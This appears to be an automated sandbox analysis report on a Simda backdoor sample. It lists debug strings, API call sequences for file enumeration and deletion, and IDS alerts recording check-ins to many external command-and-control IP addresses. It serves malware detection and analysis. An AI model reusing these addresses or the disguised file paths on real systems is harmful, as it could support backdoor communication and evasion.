Source:	Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000003.3343594271.0000000008626000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb552 source: Bpfz752pYZ.exe, svchost.exe.0.dr
Source:	Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.3398141991.0000000005870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: Bpfz752pYZ.exe, svchost.exe.0.dr
Source:	Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.3404415145.0000000008DFB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\vojydoc.com\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000003.3343091466.00000000086C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402753953.00000000086C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000003.3343091466.00000000086C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402753953.00000000086C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NcYLgtXIKJgHj.exe, 00000006.00000002.2551332510.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000007.00000000.2489007381.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 0000000A.00000002.2560697130.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 0000000E.00000002.2551302357.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000010.00000002.2531133177.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000014.00000002.2579234014.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2605798630.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000019.00000002.2614419059.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 0000001C.00000000.2585490628.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000000.2593001652.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000022.00000002.2694069303.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000024.00000002.2644364291.00000000005AE000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000003.3267668085.00000000086BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.3398141991.0000000005870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.3397191515.00000000056A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb( source: svchost.exe, 00000002.00000002.3402753953.00000000086B9000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	2_2_02C97CE0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,	2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,	2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,	2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,	2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	2_2_02C9BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	6_2_0175D189
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	6_2_0175D0C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	6_2_0175BB20
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	6_2_0175BBE9
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01767CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	6_2_01767CE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0176BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	6_2_0176BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017466D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	6_2_017466D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	7_2_0311BB20
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	7_2_0311BBE9
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	7_2_0311D189
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	7_2_0311D0C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0312BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	7_2_0312BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031066D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	7_2_031066D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03127CE0 LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	7_2_03127CE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	10_2_0153D189
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	10_2_0153D0C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	10_2_0153BB20
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	10_2_0153BBE9
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01547CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	10_2_01547CE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0154BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	10_2_0154BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015266D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	10_2_015266D0

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,

2_2_02C9C3DB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58865 -> 23.253.46.64:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49711 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49712 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49710 -> 85.17.31.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58864 -> 85.17.31.82:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.6:64197
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58861 -> 99.83.170.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58875 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58870 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49708 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58860 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58877 -> 103.150.10.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49709 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58874 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58863 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:62037 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:62034 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58862 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58871 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49713 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:61112 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58927 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49707 -> 23.253.46.64:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58859 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:62038 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:62036 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:55442 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:55436 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:62035 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:55368 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63482 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63305 -> 23.253.46.64:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63292 -> 99.83.170.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63294 -> 23.253.46.64:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63471 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63472 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63485 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63480 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63484 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52002 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.6:50679
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63302 -> 85.17.31.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63518 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59161 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50525 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63522 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63298 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50520 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50521 -> 23.253.46.64:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50515 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50517 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59153 -> 85.17.31.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59148 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50522 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59156 -> 75.2.71.199:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:56236 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59147 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59154 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50518 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63293 -> 85.17.31.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64576 -> 5.79.71.205:80
